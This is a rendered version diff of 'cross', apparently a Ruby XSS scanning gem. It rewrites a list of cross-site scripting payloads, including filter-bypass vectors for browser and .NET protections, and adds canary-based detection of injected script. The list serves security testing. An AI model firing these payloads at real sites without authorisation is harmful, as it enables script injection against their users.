cross 0.50.0 → 0.60.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/lib/cross/engine.rb +9 -5
- data/lib/cross/version.rb +1 -1
- data/lib/cross/xss.rb +61 -59
- metadata +1 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA1:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 4f1bec8b1ce4f2e496fe86f5d966efb87696b4e9
|
4
|
+
data.tar.gz: 8953c2f3a406c7a3cedbeb6f09395e2ddd7e5c11
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: acb82a8dbe95bf8c952f2537d03642ec4f6d059202914d93f8509605beb208bf6088fdca447d84934f5d61446b7ad4e8f9b3442ed213091685abade5879c006e
|
7
|
+
data.tar.gz: a159b734f9bb303170e2e922c936c4c89abfe83524f58f2392bee7e0b2e679813c8371d5c01edd46faa615b39e26f4e94cb7b020aa73e0eeba7ac0d1954b8cb6
|
data/lib/cross/engine.rb
CHANGED
@@ -75,8 +75,8 @@ module Cross
|
|
75
75
|
|
76
76
|
scripts = page.search("//script")
|
77
77
|
scripts.each do |sc|
|
78
|
-
$logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert(
|
79
|
-
return true if sc.children.text.include?("alert(
|
78
|
+
$logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
|
79
|
+
return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
|
80
80
|
end
|
81
81
|
|
82
82
|
return false if options[:oneshot]
|
@@ -115,8 +115,6 @@ module Cross
|
|
115
115
|
ff.value = find_sample_value_for(options[:sample_post], ff.name) unless ff.name==options[:parameter_to_tamper]
|
116
116
|
ff.value = pattern if ff.name==options[:parameter_to_tamper]
|
117
117
|
|
118
|
-
|
119
|
-
# promo=Promo1&codice=&nome=&cognome=&indirizzo=%3Cscript%3Ealert%28%27cross+canary%27%29%3C%2Fscript%3E&comune=&CAP=&provincia=&num1=&num2=&mail=&codfisc=&fase=1
|
120
118
|
end
|
121
119
|
end
|
122
120
|
|
@@ -126,7 +124,13 @@ module Cross
|
|
126
124
|
$logger.err "Page is empty" if pp.body.empty?
|
127
125
|
scripts = pp.search("//script")
|
128
126
|
scripts.each do |sc|
|
129
|
-
return true if sc.children.text.include?("alert(
|
127
|
+
return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
|
128
|
+
end
|
129
|
+
|
130
|
+
# This is for input html field javascript event evasion
|
131
|
+
inputs = pp.search("//input")
|
132
|
+
inputs.each do |input|
|
133
|
+
return true if ! input['onmouseover'].nil? && input['onmouseover'].include?("alert(#{Cross::Attack::XSS::CANARY})")
|
130
134
|
end
|
131
135
|
end
|
132
136
|
return false if options[:oneshot]
|
data/lib/cross/version.rb
CHANGED
data/lib/cross/xss.rb
CHANGED
@@ -2,69 +2,71 @@ module Cross
|
|
2
2
|
module Attack
|
3
3
|
class XSS
|
4
4
|
|
5
|
+
CANARY = 666
|
6
|
+
|
5
7
|
def self.each
|
6
8
|
|
7
9
|
evasions = [
|
8
|
-
"
|
9
|
-
"<script>alert(
|
10
|
-
"
|
11
|
-
"/--><script>alert(
|
12
|
-
"
|
13
|
-
"/--></ScRiPt><ScRiPt>alert(
|
14
|
-
"
|
15
|
-
"//;-->alert(
|
16
|
-
"
|
17
|
-
"\"//;\nalert(
|
18
|
-
"
|
10
|
+
"a onmouseover=alert(#{Cross::Attack::XSS::CANARY})",
|
11
|
+
"<script>alert(#{Cross::Attack::XSS::CANARY})</script>",
|
12
|
+
"<script>alert(#{Cross::Attack::XSS::CANARY});</script>",
|
13
|
+
"/--><script>alert(#{Cross::Attack::XSS::CANARY})</script>",
|
14
|
+
"/--><script>alert(#{Cross::Attack::XSS::CANARY});</script>",
|
15
|
+
"/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY})</ScRiPt>",
|
16
|
+
"/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY});</ScRiPt>",
|
17
|
+
"//;-->alert(#{Cross::Attack::XSS::CANARY})",
|
18
|
+
"//;-->alert(#{Cross::Attack::XSS::CANARY});",
|
19
|
+
"\"//;\nalert(#{Cross::Attack::XSS::CANARY})",
|
20
|
+
"\"//;\nalert(#{Cross::Attack::XSS::CANARY});",
|
19
21
|
# more exotic vectors (antisnatchor's collection)
|
20
|
-
"<script/anyjunk>alert(
|
21
|
-
"<<script>alert(
|
22
|
-
"<img onerror=alert(
|
23
|
-
"<xml onreadystatechange=alert(
|
24
|
-
"<style onreadystatechange=alert(
|
25
|
-
"<iframe onreadystatechange=alert(
|
26
|
-
"<object onerror=alert(
|
27
|
-
"<object type=image src=/images/live.gif onreadystatechange=alert(
|
28
|
-
"<img type=image src=/images/live.gif onreadystatechange=alert(
|
29
|
-
"<input type=image src=/images/live.gif onreadystatechange=alert(
|
30
|
-
"<isindex type=image src=/images/live.gif onreadystatechange=alert(
|
31
|
-
"<script onreadystatechange=alert(
|
32
|
-
"<bgsound onpropertychange=alert(
|
33
|
-
"<body onbeforeactivate=alert(
|
34
|
-
"<body onfocusin=alert(
|
35
|
-
"<input autofocus onfocus=alert(
|
36
|
-
"<input onblur=alert(
|
37
|
-
"<body onscroll=alert(
|
38
|
-
"</a onmousemove=alert(
|
39
|
-
"<video src=1 onerror=alert(
|
40
|
-
"<audio src=1 onerror=alert(
|
41
|
-
"<object data=javascript:alert(
|
42
|
-
"<iframe src=javascript:alert(
|
43
|
-
"<embed src=javascript:alert(
|
44
|
-
"<form id=test /><button form=test formaction=javascript:alert(
|
45
|
-
"<event-source src=javascript:alert(
|
46
|
-
"<x style=behavior:url(#default#time2) onbegin=alert(
|
47
|
-
"<x style=x:expression(alert(
|
48
|
-
"<x onclick=alert(
|
49
|
-
"<img onerror=\"alert(
|
50
|
-
"<img onerror=`alert(
|
51
|
-
"<img/onerror=\"alert(
|
52
|
-
"<img onerror=alert(
|
53
|
-
"<img onerror=alert(
|
54
|
-
"<img onerror=alert(
|
55
|
-
"<img onerror=alert(
|
56
|
-
"<img onerror=alert(
|
57
|
-
"<img onerror=alert(
|
58
|
-
"<img onerror=alert(
|
59
|
-
"<img onerror=alert(
|
60
|
-
"<img onerror=alert(
|
61
|
-
"<script>function::['alert'](
|
62
|
-
"<svg><script>//
alert(
|
63
|
-
"<script>/*///*/alert(
|
64
|
-
"<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(
|
65
|
-
"+ADw-script+AD4-alert(
|
66
|
-
"},alert(
|
67
|
-
"\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert(
|
22
|
+
"<script/anyjunk>alert(#{Cross::Attack::XSS::CANARY})</script>",
|
23
|
+
"<<script>alert(#{Cross::Attack::XSS::CANARY});//<</script>",
|
24
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
25
|
+
"<xml onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
26
|
+
"<style onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
27
|
+
"<iframe onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
28
|
+
"<object onerror=alert(#{Cross::Attack::XSS::CANARY})>",
|
29
|
+
"<object type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})></object>",
|
30
|
+
"<img type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
31
|
+
"<input type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
32
|
+
"<isindex type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
33
|
+
"<script onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
34
|
+
"<bgsound onpropertychange=alert(#{Cross::Attack::XSS::CANARY})>",
|
35
|
+
"<body onbeforeactivate=alert(#{Cross::Attack::XSS::CANARY})>",
|
36
|
+
"<body onfocusin=alert(#{Cross::Attack::XSS::CANARY})>",
|
37
|
+
"<input autofocus onfocus=alert(#{Cross::Attack::XSS::CANARY})>",
|
38
|
+
"<input onblur=alert(#{Cross::Attack::XSS::CANARY}) autofocus><input autofocus>",
|
39
|
+
"<body onscroll=alert(#{Cross::Attack::XSS::CANARY})><br><br>...<br><input autofocus>",
|
40
|
+
"</a onmousemove=alert(#{Cross::Attack::XSS::CANARY})>",
|
41
|
+
"<video src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
|
42
|
+
"<audio src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
|
43
|
+
"<object data=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
|
44
|
+
"<iframe src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
|
45
|
+
"<embed src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
|
46
|
+
"<form id=test /><button form=test formaction=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
|
47
|
+
"<event-source src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
|
48
|
+
"<x style=behavior:url(#default#time2) onbegin=alert(#{Cross::Attack::XSS::CANARY})>",
|
49
|
+
"<x style=x:expression(alert(#{Cross::Attack::XSS::CANARY}))>",
|
50
|
+
"<x onclick=alert(#{Cross::Attack::XSS::CANARY}) src=a>Click here</x>",
|
51
|
+
"<img onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
|
52
|
+
"<img onerror=`alert(#{Cross::Attack::XSS::CANARY})`src=a>",
|
53
|
+
"<img/onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
|
54
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
55
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
56
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
57
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
58
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
59
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
60
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
61
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
62
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
63
|
+
"<script>function::['alert'](#{Cross::Attack::XSS::CANARY})</script>",
|
64
|
+
"<svg><script>//
alert(#{Cross::Attack::XSS::CANARY})</script>", #Chrome <= 18 XssAuditor bypass
|
65
|
+
"<script>/*///*/alert(#{Cross::Attack::XSS::CANARY});</script>", #Chrome <= 20 XssAuditor bypass
|
66
|
+
"<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(#{Cross::Attack::XSS::CANARY}))>", #.NET RequestValidator bypass
|
67
|
+
"+ADw-script+AD4-alert(#{Cross::Attack::XSS::CANARY})+ADw-/script+AD4-", # UTF-7
|
68
|
+
"},alert(#{Cross::Attack::XSS::CANARY}),function x(){//", # DOM breaker
|
69
|
+
"\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert(#{Cross::Attack::XSS::CANARY})\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
|
68
70
|
]
|
69
71
|
evasions.each do |pattern|
|
70
72
|
yield pattern if block_given?
|